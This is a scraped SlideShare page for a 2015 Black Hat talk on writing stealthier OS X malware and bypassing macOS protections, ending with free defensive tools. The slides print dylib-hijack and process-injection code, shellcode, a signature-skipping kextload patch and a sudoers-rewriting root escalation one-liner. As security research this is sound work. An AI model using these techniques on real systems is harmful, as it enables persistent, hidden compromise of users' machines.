SlideShare a Scribd company logo

Black Hat '15: Writing Bad @$$ Malware for OS X

Synack, profile picture
Synack

The document discusses the current landscape of malware on macOS, highlighting the rise of OS X malware families and their persistence techniques. It covers various methods of infection, defenses against malware, and the ineffectiveness of existing malware detection solutions. Additionally, it explores advanced techniques for bypassing security features like Gatekeeper and XProtect.

Technology
1 of 63
Downloaded 40 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
@patrickwardle Writing Bad @$$ Malware for OS X
“leverages the best combination of humans and technology to discover security vulnerabilities in our customers’ web apps, mobile apps, and infrastructure endpoints” WHOIS @patrickwardle    
this talk will cover… OUTLINE overview of os x malware bad @$$ malware defenses }bypassing pspspersistenceinfection self-defense features talk does not cover firmware or kernel-mode OS X malware (see: "Thunderstrike 2: Sith Strike")
OVERVIEW OF OS X MALWARE the status quo
macs are everywhere (home & enterprise) THE RISE OF MACS macs as % of total usa pc sales #3 usa / #5 worldwide vendor in pc shipments percentage 0 3.5 7 10.5 14 year '09 '10 '11 '12 '13 doesn’t  include  iDevices "Mac notebook sales have grown 21% over the last year, while total industry sales have fallen" -apple (3/2015)
but macs don’t get malware…right? MALWARE ON OS X? ‘first’ virus (elk cloner) infected apple II’s last 5 years; ~50 new 
 os x malware families “It doesn’t get PC viruses. A Mac isn’t susceptible to the thousands of viruses plaguing Windows-based computers.” -apple.com (2012) "[2014] nearly 1000 unique attacks on Macs; 25 major families" -kasperksy
__cstring:0000E910
 db  'clipboardd',0
 db  'com.apple.service.clipboardd.plist',0   db  '/Library/LaunchAgents',0     db  '<plist  version="1.0">',0Ah        '<key>RunAtLoad</key>',0Ah   provides reverse shell, keylogging, & screen capture OSX/XSLCMD “a previously unknown variant of the APT backdoor XSLCmd which is designed to compromise Apple OS X systems” -fireeye.com launch agent reverse shell keylogging screen capture OS X 10.9+ crashes
‘standard’ backdoor, providing survey, download/execute, etc. OSX/IWORM #  fs_usage  -­‐w  -­‐f  filesys   20:28:28.727871    open      /Library/LaunchDaemons/com.JavaW.plist                                               20:28:28.727890    write        B=0x16b                                                                                                         launch daemon survey download execute persisting infected torrents launch daemon plist
an iOS infector (via USB) OSX/WIRELURKER } contacts texts launch daemons survey} infected app(s)
 'Maiyadi App Store' infects connected iPhones “a collection of scripts, plists, & binaries all duct-taped together... making it easy to detect.” -j zdziarski
hackingteam's implant; collect all things! OSX/CRISIS (RCSMAC) launch agent rootkit component “There is nothing to be impressed from them from a technical point of view.” -@osxreverser persistence intelligence collection features
the current state of OS X malware THE (KNOWN) STATUS QUO persistence psp bypassself-defense features ‣ well known techniques ‣ majority: launch items ‣ minimal obfuscation ‣ no active self-defense ‣ inelegantly implemented ‣ suffice for the job ‣ no psp awareness ‣ no counter-measures “current OS X malware, while sufficient, is inelegant, amateur, and trivial to detect & prevent”grade: C+ stealth ‣ 'hide' in plain site ‣ stand-alone executables infection ‣ trojans ‣ phishing/old exploits
BAD @$$ OS X MALWARE current malware++
current methods are rather lame INITIAL INFECTION VECTOR(S) fake codecs fake installers/updates infected torrents/apps }protects dumb users Gatekeeper blocking untrusted code somewhat effective, but smart users should be ok.
a far better infection channel INFECTING SOFTWARE DOWNLOADS my dock MitM & infect non-SSL'd internet downloads HTTP :( still need to bypass GateKeeper... ;)
these should be secure, right!? INFECTING AV SOFTWARE DOWNLOADS all the security software I could find, was downloaded over HTTP! LittleSnitch Sophos } ClamXav
current methods are very lame PERSISTANCE launch items } login items persistence methods ‣ well known ‣ easily visible wirelurker's 4(!) launch daemons $  python  knockknock.py   com.apple.MailServiceAgentHelper   path:  /usr/bin/com.apple.MailServiceAgentHelper   com.apple.appstore.PluginHelper   path:  /usr/bin/com.apple.appstore.PluginHelper   periodicdate   path:  /usr/bin/periodicdate
 
 systemkeychain-­‐helper   path:  /usr/bin/systemkeychain-­‐helper MacProtector's login item
fairly stealthy & difficult to disinfect BINARY INFECTION? Process:                  Safari  [1599]   Path:                        Safari.app/Contents/MacOS/Safari   Exception  Type:    EXC_CRASH  (Code  Signature  Invalid)   Exception  Codes:  0x0000000000000000,  0x0000000000000000 OS loader verifies all signatures :( killed by the loader
the crypto seems solid, but what if it was gone? BINARY INFECTION? code signature :) #  md5  Safari.app/Contents/MacOS/Safari  -­‐>                633d043cf9742d6f0787acdee742c10d
 #  unsign.py  Safari.app/Contents/MacOS/Safari
    Safari  code  signature  removed
 
 #  md5  Safari.app/Contents/MacOS/Safari  -­‐>              825edd6a1e3aefa98d7cf99a60bac409
 
 $  open  /Applications/Safari.app  &&  ps  aux  |  grep  Safari      patrick    31337    /Applications/Safari.app  
self-contained somewhat difficult to detect (now), lots of options! PERSISTENCE VIA BINARY INFECTION add new LC_LOAD_DYLIB? hijack entry point? } difficult to disinfect! google 'OS.X/Boubou'
simply plant a dylib to win! DYLIB HIJACKING <blah>.dylib <blah>.dylib "I need <blah>.dylib" app dir "DLL Hijacking on OS X? #@%& Yeah!" DefCon (Sat, Aug 8th)
via Apple's PhotoStreamAgent ('iCloudPhotos.app') DYLIB HIJACKING PERSISTENCE configure hijacker against PhotoFoundation (dylib) copy to /Applications/iPhoto.app/Contents/ Library/LoginItems/PhotoFoundation.framework/ Versions/A/PhotoFoundation $  reboot     $  lsof  -­‐p  <pid  of  PhotoStreamAgent>   /Applications/iPhoto.app/Contents/Library/LoginItems/PhotoFoundation.framework/Versions/A/PhotoFoundation   /Applications/iPhoto.app/Contents/Frameworks/PhotoFoundation.framework/Versions/A/PhotoFoundation PhotoStreamAgent novel no new processes no binary/OS modifications } abuses legitimate functionality of OS X OS X El Capitan still 'hijackable'
currently, essentially non-existent SELF-DEFENSE 'hide' in plain sight } some crypto self-defense methods trivial to find trivial to analyze trivial to disinfect too easy for the AV companies!
abusing OS X's natively supported encryption ENCRYPTED MACH-O BINARIES //load  &  decrypt  segments   load_segment(...){      //decrypt  encrypted  segments      if(scp-­‐>flags  &  SG_PROTECTED_VERSION_1)    unprotect_dsmos_segment(scp-­‐>fileoff,  scp-­‐>filesize,  vp,                                                  pager_offset,  map,  map_addr,  map_size);     }
 //decrypt  chunk   unprotect_dsmos_segment(...){
    //function  pointer  to  decryption  routine      crypt_info.page_decrypt  =  dsmos_page_transform;
    //decrypt
    vm_map_apple_protected(map,  map_addr,  map_addr  +  map_size,  
                                                &crypt_info);
 } ourhardworkbythesewordsguar dedpleasedontsteal(c)AppleC algo: Blowfish (pre 10.6, AES) $  strings  -­‐a  myMalware     applicationDidFinishLaunching:   @"NSString"16@0:8   I  <3  BLACKHAT!   $  ./protect  myMalware    encrypting  'myMalware'   type:  CPU_TYPE_X86_64    encryption  complete   $  strings  -­‐a  myMalware  
 n^jd[P5{Q   r_`EYFaJq07 known malware: ~50% detection drop
tie to a specific target STRONGLY ENCRYPT YOUR MALWARE "environmental key generation towards clueless agents" "[the malware] tied the infection to the specific machine, and meant the payload couldn't be decrypted without knowing the NTFS object ID" 'equation group malware' N: environmental observation
 H: a one way (hash) function M: hash(es) H of observation N, needed for activation, carried by agent
 K: a key //at runtime if H(H(N)) = M then let K := H(N) } intended target any other
IN-MEMORY DECRYPTION & LOADING C&C server } custom in-memory loader? map image load dependencies link OS X supports in-memory loading! local file-system memory custom crypto, requires custom loader
dyld supports in-memory loading/linking IN-MEMORY MACH-O LOADING //vars   NSObjectFileImage  fileImage  =  NULL;   NSModule  module                          =  NULL;   NSSymbol  symbol                          =  NULL;   void  (*function)(const  char  *message);     //have  an  in-­‐memory  (file)  image  of  a  mach-­‐O  file  to  load/link   //  -­‐>note:  memory  must  be  page-­‐aligned  and  alloc'd  via  vm_alloc!
 //create  object  file  image
 NSCreateObjectFileImageFromMemory(codeAddr,  codeSize,  &fileImage);
 //link  module  
 module  =  NSLinkModule(fileImage,  "<anything>",  NSLINKMODULE_OPTION_PRIVATE);   //lookup  exported  symbol  (function)   symbol  =  NSLookupSymbolInModule(module,  "_"  "HelloBlackHat");
 //get  exported  function's  address
 function  =  NSAddressOfSymbol(symbol);
 //invoke  exported  function
 function("thanks  for  being  so  offensive  ;)"); loading a mach-O file from memory sample code released by apple (2005) 'MemoryBasedBundle' stealth++ no longer hosted
unlink dylibs to complicated detection 'HIDING' LOADED LIBRARIES struct  task_dyld_info  {     mach_vm_address_t   all_image_info_addr;       mach_vm_size_t        all_image_info_size;       integer_t                all_image_info_format;         };   struct  dyld_all_image_infos  {     uint32_t             version;         uint32_t             infoArrayCount;       const  struct  dyld_image_info*  infoArray;      ... remove from infoArray decrement infoArrayCount $  unlinkDylib   [+]  injected  into  1337,  unlinked  dylib:  /Users/patrick/hideMe.dylib     
 #  lldb  -­‐p  1337   (lldb)  image  list  |  hideMe.dylib   error:  the  target  has  no  matching  modules loaded dylib data structures to unlink unlinked dylib; hidden from lldb et. al. stealth++
other random ideas SELF DEFENSE prevent deletion? 'complicating' deletion #  chflags  schg  malware.dylib
 #  rm  malware.dylib   rm:  malware.dylib:  Operation  not  permitted "The schg flag can only be unset in single-user mode" self-monitoring? detect local access (dtrace) #  /usr/bin/opensnoop   0    90189  AVSCANNER      malware.dylib virusTotal 0 10 20 30 40 jan feb mar apr may detect detections google adwords? }
getting code into remote processes RUN-TIME PROCESS INJECTION newosxbook.com }mac hacker's handbook run-time injection mach_inject (PPC & i386) x86_64 no x86_64 :( buggy/broken :( (intentionally) at run-time, inject arbitrary dynamic libraries (dylibs) into arbitrary process the goal
determining target process' architecture RUN-TIME PROCESS INJECTION //check  if  remote  process  is  x86_64   BOOL  Is64Bit(pid_t  targetPID)   {          //info  struct          struct  proc_bsdshortinfo  procInfo;                    //get  proc  info          //  -­‐>assumes  valid  pid,  etc          proc_pidinfo(targetPID,  PROC_PIDT_SHORTBSDINFO,                                    0,  &procInfo,  PROC_PIDT_SHORTBSDINFO_SIZE);                    //'pbsi_flags'  has  a  64-­‐bit  mask          return  procInfo.pbsi_flags  &  PROC_FLAG_LP64;   } external process, architecture detection all 64-bit 32 3rd-party 32-bit google drive dropbox vpn apps 64 } }
//remote  library  loading  shellcode  (x86_64)     char  shellCode[]  =    "x90"                                                                                //  nop..    "x55"                                                                                //  pushq    %rbp    "x48x89xe5"                                                                //  movq      %rsp,  %rbp    "x48x83xecx20"                                                        //  subq      $32,  %rsp    "x89x7dxfc"                                                                //  movl      %edi,  -­‐4(%rbp)    "x48x89x75xf0"                                                        //  movq      %rsi,  -­‐16(%rbp)    "xb0x00"                                                                        //  movb      $0,  %al    
  //  call  pthread_set_self      "x48xbfx00x00x00x00x00x00x00x00"        //  movabsq  $0,  %rdi    "x48xb8"  "_PTHRDSS"                                                  //  movabsq  $140735540045793,  %rax    "xffxd0"                                                                        //  callq    *%rax    "x48xbex00x00x00x00x00x00x00x00"        //  movabsq  $0,  %rsi    "x48x8dx3dx2cx00x00x00"                                //  leaq      44(%rip),  %rdi    
  //  dlopen    "x48xb8"  "DLOPEN__"                                                  //  movabsq  $140735516395848,  %rax    "x48xbex00x00x00x00x00x00x00x00"        //  movabsq  $0,  %rsi    "xffxd0"                                                                        //  callq    *%rax        //  sleep(1000000)...    "x48xbfx00xe4x0bx54x02x00x00x00"        //  movabsq  $10000000000,  %rdi    "x48xb8"  "SLEEP___"                                                  //  movabsq  $140735516630165,  %rax    "xffxd0"                                                                        //  callq    *%rax    //  plenty  of  space  for  a  full  path  name  here    "LIBLIBLIBLIB"  "x00x00x00x00x00x00...."; target's process architecture RUN-TIME PROCESS INJECTION www.newosxbook.com 64 }addrs patched in at runtime
getting code into remote processes RUN-TIME PROCESS INJECTION task_for_pid() mach_vm_allocate() thread_create_running()mach_vm_write() vm_protect() task_for_pid() requires r00t
dylib injection (again) ftw! LOAD-TIME PROCESS INJECTION gain automatic & persistent code execution within a process only via a dynamic library hijack }no binary / OS file modifications no process monitoring no complex runtime injection no detection of injection <010>
into Apple's Xcode LOAD-TIME PROCESS INJECTION $  python  dylibHijackScanner.py     
 Xcode  is  vulnerable  (multiple  rpaths)   'binary':                '/Applications/Xcode.app/Contents/MacOS/Xcode'   'importedDylib':  '/DVTFoundation.framework/Versions/A/DVTFoundation'     'LC_RPATH':            '/Applications/Xcode.app/Contents/Frameworks' configure hijacker against DVTFoundation (dylib) copy to /Applications/Xcode.app/Contents/ Frameworks/DVTFoundation.framework/Versions/A/ do you trust your compiler now!? 
 (k thompson) Xcode
...starting with Apple's BYPASSING SECURITY PRODUCTS/TECHNOLOGIES xprotectgatekeeper os x sandbox code-signing ‘wins’ < so we’re all safe now, right?!? nope! }
allowing unsigned code to execute BYPASSING GATEKEEPER circumvent gatekeeper's draconic blockage via a dynamic library hijack the goal bypass this? gatekeeper in action
all files with quarantine attribute are checked HOW GATEKEEPER WORKS quarantine attributes //attributes   $  xattr  -­‐l  ~/Downloads/malware.dmg        com.apple.quarantine:0001;534e3038;      Safari;  B8E3DA59-­‐32F6-­‐4580-­‐8AB3...   safari, etc. tags downloaded content "Gatekeeper is an anti-malware feature of the OS X operating system. It allows users to restrict which sources they can install applications from, in order to reduce the likelihood of executing a Trojan horse" -apple.com
go home gatekeeper, you are drunk! GATEKEEPER BYPASS find an -signed or 'mac app store' app that contains an external relative reference to a hijackable dylib create a .dmg with the necessary folder structure to contain the malicious dylib in the externally referenced location #winning verified, so can't modify .dmg/.zip layout (signed) application <external>.dylib gatekeeper only verifies the app bundle!! not verified!
#winning GATEKEEPER BYPASS gatekeeper setting's (maximum) gatekeeper bypass :) unsigned (non-Mac App Store) code execution!! CVE 2015-3715 patched in OS X 10.10.4 standard alert still can bypass ;)
avoiding detection BYPASSING XPROTECT circumvent XProtect's malware detection so that malware can run in an uninhibited manner the goal bypass this? XProtect in action (flagging iWorm)
apple's built-in AV product is weak sauce BYPASSING XPROTECT XProtect signature file (iWorm) name hash file name } bypasses recompile write new ...or just rename!
decently secure, but lots of OS X bugs! ESCAPING THE OS X SANDBOX escape from the OS X sandbox to so that our malicious code can perform malicious actions. the goal user data system resources app sandboxed app 20+ bugs that could bypass the sandbox (‘project zero’) "Unauthorized Cross-App Resource Access on Mac OS X & iOS" [ bypasses ]
allowing unsigned kext to load BYPASSING KERNEL-MODE CODE SIGNING load malicious unsigned kexts into the kernel the goal bypass this? OS X kernel-mode signing checks
directly interface with the kernel BYPASSING KERNEL-MODE CODE SIGNING //unload  kext  daemon   #  launchctl  unload  /System/Library/LaunchDaemons/com.apple.kextd.plist   //load  (unsigned)  driver  with  custom  kext_load   #  ./patchedKextload  -­‐v  unsigned.kext
    Can't  contact  kextd;  attempting  to  load  directly  into  kernel   //profit  :)   #  kextstat  |  grep  -­‐i  unsigned      138        0  0xffffff7f82eeb000    com.synack.unsigned unsigned kext loading download kext_tools patch & recompile kextload loadKextsIntoKernel(KextloadArgs  *  toolArgs)
 {
    //sigResult  =  checkKextSignature(theKext,  0x1,  earlyBoot);      //always  OK!      sigResult  =  0;   } patched kextload
rootpipe reborn & more! NEED ROOT? copy Directory Utility to /tmp to get write permissions copy plugin (.daplugin) into Directory Utility's internal plugin directory execute Directory Utility evil plugin payload WriteConfig XPC service Dir. Utility $  ls  -­‐lart  /private/tmp   drwxr-­‐xr-­‐x    patrick    wheel      Directory  Utility.app "Stick That In Your (root)Pipe & Smoke It" 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s or, another bug (Stefan Esser) unpatched!
...and the rest (equally lame) BYPASSING SECURITY PRODUCTS LittleSnitch Sophos ClamXav } bypasses recompile write new behavioral based (firewall)
abusing trust to access the network BYPASSING LITTLESNITCH generically bypass LittleSnitch to allow malicious code to access the network in an uninhibited manner? the goal bypass this? LittleSnitch in action
load-time 'injection' into a trusted process LITTLE SNITCH BYPASS 0X1 $  python  dylibHijackScanner.py     
 GPG  Keychain  is  vulnerable  (weak/rpath'd  dylib)   'binary':                '/Applications/GPG  Keychain.app/Contents/MacOS/GPG  Keychain'   'weak  dylib':        '/Libmacgpg.framework/Versions/B/Libmacgpg'     'LC_RPATH':            '/Applications/GPG  Keychain.app/Contents/Frameworks' GPG Keychain LittleSnitch rule for GPG Keychain got 99 problems but LittleSnitch ain't one ;)
more generically, via iCloud LITTLE SNITCH BYPASS 0X2 iCloud un-deletable system rule: "anybody can talk to iCloud" LittleSnitch's iCloud rule o rly!?...yes!
putting some pieces all together SIMPLE END-TO-END ATTACK persist exfil file download & execute cmd persistently install a malicious dylib as a hijacker upload a file ('topSecret') to a remote iCloud account download and run a command ('Calculator.app') doesn't require r00t!
ClamXav LittleSnitch Sophos the AV industry vs me ;) PSP TESTING are these blocked? persist exfil file download & execute cmd OS X 'security' products
DEFENSE free os x security tools
MY CONUNDRUM …I love my mac, but it's so easy to hack "No one is going to provide you a quality service for nothing. If you’re not paying, you’re the product." -unnamed AV company ha, BULLSHIT! + I should write some OS X security tools to protect my Mac ....and share 'em freely :)
free OS X tools & malware samples OBJECTIVE-SEE malware samples :) KnockKnock BlockBlock TaskExplorer
KNOCKKNOCK UI detecting persistence: now an app for that! KnockKnock (UI)
KNOCKKNOCK UI VirusTotal integration detect submit rescan results VirusTotal integrations
BLOCKBLOCK a 'firewall' for persistence locations status bar BlockBlock, block blocking :) HackingTeam's OS X implant "0-day bug hijacks Macs" (payload)
TASKEXPLORER explore all running tasks (processes) '#' filters signing virus total dylibs files network
EL CAPITAN (OS X 10.11) next version of OS X to keep us all safe? System  Integrity  Protection
 "A  new  security  policy  that  applies  to  every  running  process,  including   privileged  code  and  code  that  runs  out  of  the  sandbox.  The  policy  extends   additional  protections  to  components  on  disk  and  at  run-­‐time,  only   allowing  system  binaries  to  be  modified  by  the  system  installer  and   software  updates.  Code  injection  and  runtime  attachments  to  system   binaries  are  no  longer  permitted."  -­‐apple.com "rootless" iWorm vs. OS X 10.11 (beta 5)"wut!?" the test:
Black Hat '15: Writing Bad @$$ Malware for OS X
CONCLUSIONS some key takeaways... bypassing pspspersistenceinfection self-defense features improve the malwarez current OS X malware is lame; leading to complacent security products! think differently
QUESTIONS & ANSWERS patrick@synack.com @patrickwardle feel free to contact me any time! "What if every country has ninjas, but we only know about the Japanese ones because they’re rubbish?" -DJ-2000, reddit.com final thought ;) "Objective-See's OS X Security Tools" Blackhat Arsenal (tomorrow, 15:30 - 18:00) syn.ac/BlackhatMalware
credits - thezooom.com - deviantart.net - iconmonstr.com - flaticon.com images - @osxreverser - http://reverse.put.as/Hitcon_2012_Presentation.pdf - https://www.syscan.org/index.php/download/get/9ee8ed70ddcb2d53169b2420f2fa286e/ SyScan15%20Pedro%20Vilaca%20-%20BadXNU%20a%20rotten%20apple - https://reverse.put.as/2013/11/23/breaking-os-x-signed-kernel-extensions-with-a-nop/
 - www.newosxbook.com - mac hacker's handbook talks/books

More Related Content

PDF
1800 automated flush bottom valves
Chaitannya Mahatme
 
PDF
DLL Hijacking on OS X
Synack
 
PDF
Virus Bulletin 2015: Exposing Gatekeeper
Synack
 
PDF
DEF CON 23: Stick That In Your (root)Pipe & Smoke It
Synack
 
PDF
iOS Automation Primitives
Synack
 
PDF
RSA OSX Malware
Synack
 
PDF
DEF CON 23: 'DLL Hijacking' on OS X? #@%& Yeah!
Synack
 
PDF
Gatekeeper Exposed
Synack
 
1800 automated flush bottom valves
Chaitannya Mahatme
 
DLL Hijacking on OS X
Synack
 
Virus Bulletin 2015: Exposing Gatekeeper
Synack
 
DEF CON 23: Stick That In Your (root)Pipe & Smoke It
Synack
 
iOS Automation Primitives
Synack
 
RSA OSX Malware
Synack
 
DEF CON 23: 'DLL Hijacking' on OS X? #@%& Yeah!
Synack
 
Gatekeeper Exposed
Synack
 

Viewers also liked (17)

PDF
DEF CON 23: Spread Spectrum Satcom Hacking: Attacking The GlobalStar Simplex ...
Synack
 
PDF
Synack cirtical infrasructure webinar
Synack
 
PDF
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!
Synack
 
PDF
Zeronights 2016 - Automating iOS blackbox security scanning
Synack
 
PDF
Structural insulated panels price
sips-structural-insulated-panels
 
PDF
Osb eps osb structural insulated panels
sips-structural-insulated-panels
 
DOCX
Lee then-lim cc-fp finals_l 014-251115
Xiao Yun
 
PDF
Mgo eps mgo structural insulated panels
sips-structural-insulated-panels
 
PPT
преимущества и недостатки интернета
Ay_sel
 
PPTX
Networkingtips 130213160947-phpapp02
Sonu Jena
 
PPTX
me
barcata
 
PDF
Why National Brands Must Adapt to Changing Traveler Behavior
Placeable
 
DOCX
Curriculo atualizado
Mariana Madalena
 
PDF
Come scegliere l'album di matrimonio?
Marco Gabriella
 
PDF
Jesusparablesaboutmoney 12737974976907-phpapp02
Sonu Jena
 
PPTX
istilah-istilah jaringan internet dalam komputer
Abednego Ringgo
 
DOCX
A touch of sin (lee sweet wan)
Xiao Yun
 
DEF CON 23: Spread Spectrum Satcom Hacking: Attacking The GlobalStar Simplex ...
Synack
 
Synack cirtical infrasructure webinar
Synack
 
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!
Synack
 
Zeronights 2016 - Automating iOS blackbox security scanning
Synack
 
Structural insulated panels price
sips-structural-insulated-panels
 
Osb eps osb structural insulated panels
sips-structural-insulated-panels
 
Lee then-lim cc-fp finals_l 014-251115
Xiao Yun
 
Mgo eps mgo structural insulated panels
sips-structural-insulated-panels
 
преимущества и недостатки интернета
Ay_sel
 
Networkingtips 130213160947-phpapp02
Sonu Jena
 
me
barcata
 
Why National Brands Must Adapt to Changing Traveler Behavior
Placeable
 
Curriculo atualizado
Mariana Madalena
 
Come scegliere l'album di matrimonio?
Marco Gabriella
 
Jesusparablesaboutmoney 12737974976907-phpapp02
Sonu Jena
 
istilah-istilah jaringan internet dalam komputer
Abednego Ringgo
 
A touch of sin (lee sweet wan)
Xiao Yun
 
Ad

Similar to Black Hat '15: Writing Bad @$$ Malware for OS X (20)

PDF
OS X Malware: Let's Play Doctor
Synack
 
PDF
Synack Shakacon OSX Malware Persistence
Ivan Einstein
 
PPTX
OSX/Pirrit: The blue balls of OS X adware
Amit Serper
 
PDF
Fruit vs Zombies: Defeat Non-jailbroken iOS Malware by Claud Xiao
Shakacon
 
PDF
Attacking the macOS Kernel Graphics Driver
Priyanka Aash
 
PPTX
A worm in the apple
Wes Widner
 
PPTX
Seminar project(computer virus)
cdebraj16101991
 
PPTX
Mmw mac malware-mac
Cyphort
 
PDF
OSX Pirrit : Why you should care about malicious mac adware
Priyanka Aash
 
PDF
Understand study
Antonio Costa aka Cooler_
 
PDF
Getting root with benign app store apps
Csaba Fitzl
 
PDF
MacOS forensics and anti-forensics (DC Lviv 2019) presentation
OlehLevytskyi1
 
PPTX
HackMiami-Final
Stephan Borosh
 
PPTX
External to DA, the OS X Way
Stephan Borosh
 
PDF
Exploiting Directory Permissions on macOS
Csaba Fitzl
 
PDF
Kaspersky Anti-Virus for Macintosh - Technical Presentation
questar
 
PDF
Security on the Mac
Allison Sheridan
 
PDF
Let's Play Doctor....by Patrick Wardle
Shakacon
 
PPTX
COMPUTER SECURITY AND OPERATING SYSTEM
faraz hussain
 
PPT
14_526_topic10.ppt
NitashaKumari2
 
OS X Malware: Let's Play Doctor
Synack
 
Synack Shakacon OSX Malware Persistence
Ivan Einstein
 
OSX/Pirrit: The blue balls of OS X adware
Amit Serper
 
Fruit vs Zombies: Defeat Non-jailbroken iOS Malware by Claud Xiao
Shakacon
 
Attacking the macOS Kernel Graphics Driver
Priyanka Aash
 
A worm in the apple
Wes Widner
 
Seminar project(computer virus)
cdebraj16101991
 
Mmw mac malware-mac
Cyphort
 
OSX Pirrit : Why you should care about malicious mac adware
Priyanka Aash
 
Understand study
Antonio Costa aka Cooler_
 
Getting root with benign app store apps
Csaba Fitzl
 
MacOS forensics and anti-forensics (DC Lviv 2019) presentation
OlehLevytskyi1
 
HackMiami-Final
Stephan Borosh
 
External to DA, the OS X Way
Stephan Borosh
 
Exploiting Directory Permissions on macOS
Csaba Fitzl
 
Kaspersky Anti-Virus for Macintosh - Technical Presentation
questar
 
Security on the Mac
Allison Sheridan
 
Let's Play Doctor....by Patrick Wardle
Shakacon
 
COMPUTER SECURITY AND OPERATING SYSTEM
faraz hussain
 
14_526_topic10.ppt
NitashaKumari2
 
Ad

More from Synack (8)

PDF
DEF CON 23: Internet of Things: Hacking 14 Devices
Synack
 
PDF
Black Hat '15: Spread Spectrum Satcom Hacking: Attacking The GlobalStar Simpl...
Synack
 
PDF
Electromagnetic Hypersensitivity and You
Synack
 
PDF
Home Automation Benchmarking Report
Synack
 
PDF
Let's Hack a House
Synack
 
PDF
Synack at AppSec California with Patrick Wardle
Synack
 
PDF
Synack at AppSec California 2015 - Geolocation Vulnerabilities
Synack
 
PDF
Synack at ShmooCon 2015
Synack
 
DEF CON 23: Internet of Things: Hacking 14 Devices
Synack
 
Black Hat '15: Spread Spectrum Satcom Hacking: Attacking The GlobalStar Simpl...
Synack
 
Electromagnetic Hypersensitivity and You
Synack
 
Home Automation Benchmarking Report
Synack
 
Let's Hack a House
Synack
 
Synack at AppSec California with Patrick Wardle
Synack
 
Synack at AppSec California 2015 - Geolocation Vulnerabilities
Synack
 
Synack at ShmooCon 2015
Synack
 

Recently uploaded (20)

PPTX
Detection-First SIEM: Rule Types, Dashboards, and Threat-Informed Strategy
ReZa AdineH
 
DOCX
The AUB Centre for AI in Media Proposal.docx
GAONE9
 
PDF
Spectral efficient network and resource selection model in 5G networks
IAESIJAI
 
PDF
Empathic Computing: Creating Shared Understanding
Mark Billinghurst
 
PPTX
Cloud computing and distributed systems.
kkkkkhan
 
PDF
Optimiser vos workloads AI/ML sur Amazon EC2 et AWS Graviton
Julien SIMON
 
PPTX
Effective Security Operations Center (SOC) A Modern, Strategic, and Threat-In...
ReZa AdineH
 
PPTX
Spectroscopy.pptx food analysis technology
nawahassan45
 
PPTX
Programs and apps: productivity, graphics, security and other tools
4mqw9zch22
 
PPTX
VMware vSphere Foundation How to Sell Presentation-Ver1.4-2-14-2024.pptx
blackmambaettijean
 
PDF
TokAI - TikTok AI Agent : The First AI Application That Analyzes 10,000+ Vira...
SOFTTECHHUB
 
PDF
NewMind AI Weekly Chronicles - August'25 Week I
NewMind AI
 
PDF
Network Security Unit 5.pdf for BCA BBA.
Serpent6
 
PDF
7 ChatGPT Prompts to Help You Define Your Ideal Customer Profile.pdf
SOFTTECHHUB
 
PDF
Peak of Data & AI Encore- AI for Metadata and Smarter Workflows
Safe Software
 
PDF
Review of recent advances in non-invasive hemoglobin estimation
IAESIJAI
 
PDF
cuic standard and advanced reporting.pdf
SimoneTitaniumTomase
 
PDF
Reach Out and Touch Someone: Haptics and Empathic Computing
Mark Billinghurst
 
PDF
Blue Purple Modern Animated Computer Science Presentation.pdf.pdf
Akar16
 
PDF
KodekX | Application Modernization Development
KodekX
 
Detection-First SIEM: Rule Types, Dashboards, and Threat-Informed Strategy
ReZa AdineH
 
The AUB Centre for AI in Media Proposal.docx
GAONE9
 
Spectral efficient network and resource selection model in 5G networks
IAESIJAI
 
Empathic Computing: Creating Shared Understanding
Mark Billinghurst
 
Cloud computing and distributed systems.
kkkkkhan
 
Optimiser vos workloads AI/ML sur Amazon EC2 et AWS Graviton
Julien SIMON
 
Effective Security Operations Center (SOC) A Modern, Strategic, and Threat-In...
ReZa AdineH
 
Spectroscopy.pptx food analysis technology
nawahassan45
 
Programs and apps: productivity, graphics, security and other tools
4mqw9zch22
 
VMware vSphere Foundation How to Sell Presentation-Ver1.4-2-14-2024.pptx
blackmambaettijean
 
TokAI - TikTok AI Agent : The First AI Application That Analyzes 10,000+ Vira...
SOFTTECHHUB
 
NewMind AI Weekly Chronicles - August'25 Week I
NewMind AI
 
Network Security Unit 5.pdf for BCA BBA.
Serpent6
 
7 ChatGPT Prompts to Help You Define Your Ideal Customer Profile.pdf
SOFTTECHHUB
 
Peak of Data & AI Encore- AI for Metadata and Smarter Workflows
Safe Software
 
Review of recent advances in non-invasive hemoglobin estimation
IAESIJAI
 
cuic standard and advanced reporting.pdf
SimoneTitaniumTomase
 
Reach Out and Touch Someone: Haptics and Empathic Computing
Mark Billinghurst
 
Blue Purple Modern Animated Computer Science Presentation.pdf.pdf
Akar16
 
KodekX | Application Modernization Development
KodekX
 

Black Hat '15: Writing Bad @$$ Malware for OS X

  • 2. “leverages the best combination of humans and technology to discover security vulnerabilities in our customers’ web apps, mobile apps, and infrastructure endpoints” WHOIS @patrickwardle    
  • 3. this talk will cover… OUTLINE overview of os x malware bad @$$ malware defenses }bypassing pspspersistenceinfection self-defense features talk does not cover firmware or kernel-mode OS X malware (see: "Thunderstrike 2: Sith Strike")
  • 4. OVERVIEW OF OS X MALWARE the status quo
  • 5. macs are everywhere (home & enterprise) THE RISE OF MACS macs as % of total usa pc sales #3 usa / #5 worldwide vendor in pc shipments percentage 0 3.5 7 10.5 14 year '09 '10 '11 '12 '13 doesn’t  include  iDevices "Mac notebook sales have grown 21% over the last year, while total industry sales have fallen" -apple (3/2015)
  • 6. but macs don’t get malware…right? MALWARE ON OS X? ‘first’ virus (elk cloner) infected apple II’s last 5 years; ~50 new 
 os x malware families “It doesn’t get PC viruses. A Mac isn’t susceptible to the thousands of viruses plaguing Windows-based computers.” -apple.com (2012) "[2014] nearly 1000 unique attacks on Macs; 25 major families" -kasperksy
  • 7. __cstring:0000E910
 db  'clipboardd',0
